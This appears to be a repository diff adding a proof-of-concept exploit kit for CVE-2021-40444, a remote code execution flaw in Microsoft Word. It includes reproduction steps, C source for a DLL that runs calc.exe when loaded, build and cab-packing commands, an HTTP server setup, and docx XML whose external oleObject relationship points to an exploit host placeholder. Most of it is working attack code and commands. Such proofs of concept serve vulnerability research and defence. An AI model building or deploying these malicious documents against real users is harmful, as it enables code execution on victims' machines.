-

README.md

@@ -0,0 +1,9 @@
+# CVE-2021-40444 PoC
+
+Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)
+
+Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)
+
+Check `REPRODUCE.md` for manual reproduce steps
+
+If your generated cab is not working, try pointing out exploit.html URL to calc.cab

REPRODUCE.md

@@ -0,0 +1,77 @@
+# CVE-2021-40444
+
+Reproduce steps for CVE-2021-40444
+
+These reproduction steps are based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file).
+
+## Generating docx
+
+Go to `maldoc/word/_rels/document.xml.rels` and edit the two ocurrences for `http://<HOST>` with the URL to the exploit.html Eg.: `http://127.0.0.1/exploit.html` file.
+
+Generate docx:
+
+`cd maldoc/ ; zip -r maldoc.docx *`
+
+## Generating malicious cab
+
+```
+#include <windows.h>
+
+void exec(void) {
+	system("C:\\Windows\\System32\\calc.exe");
+	return;
+}
+
+BOOL WINAPI DllMain(
+    HINSTANCE hinstDLL,
+    DWORD fdwReason, 
+    LPVOID lpReserved )
+{
+    switch( fdwReason ) 
+    { 
+        case DLL_PROCESS_ATTACH:
+           exec(); 
+           break;
+
+        case DLL_THREAD_ATTACH:
+            break;
+
+        case DLL_THREAD_DETACH:
+            break;
+
+        case DLL_PROCESS_DETACH:
+            break;
+    }
+    return TRUE;
+}
+```
+
+Exec:
+
+`i686-w64-mingw32-gcc -shared calc.c -o calc.dll`
+
+Generate cab (install lcab `sudo apt-get install lcab`)
+
+`cp calc.dll championship.inf ; mkdir gen/ ; cd gen/ ; lcab '../championship.inf' out.cab`
+
+Copy out.cab into `www/` directory, modify exploit.html to point to `http://127.0.0.1/out.cab`
+
+Execute Python script: `patch_cab.py`
+
+Finally, setup server:
+
+`cd www/ ; sudo python3 -m http.server 80`
+
+# End
+
+Execute now maldoc.docx in target VM
+
+If not working, make sure there is a `championship.inf` file at `C:\Users\<user>\AppData\Temp\`
+
+If file is present but DLL did not get executed, make sure you are opening docx from a folder reached from by exploit.html, like Documents, Desktop, or Downloads.
+
+# More
+
+To automatically resolve the array obfuscation on HTML file use `deobfuscate.py` (already has hardcoded the mutated array)
+
+Anyway, there is already a deobfuscated version: `deob.html`

data/word_dat/[Content_Types].xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="wmf" ContentType="image/x-wmf"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>

data/word_dat/_rels/.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>

data/word_dat/docProps/app.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal</Template><TotalTime>34</TotalTime><Pages>1</Pages><Words>206</Words><Characters>1176</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>9</Lines><Paragraphs>2</Paragraphs><ScaleCrop>false</ScaleCrop><Company>Consumers Association</Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>1380</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>16.0000</AppVersion></Properties>

data/word_dat/docProps/core.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Microsoft</dc:creator><dc:description></dc:description><cp:lastModifiedBy>user</cp:lastModifiedBy><cp:revision>6</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2013-10-31T15:25:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-31T16:47:00Z</dcterms:modified><dc:language>en-US</dc:language></cp:coreProperties>

data/word_dat/word/_rels/document.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:<EXPLOIT_HOST_HERE>!x-usc:<EXPLOIT_HOST_HERE>" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/></Relationships>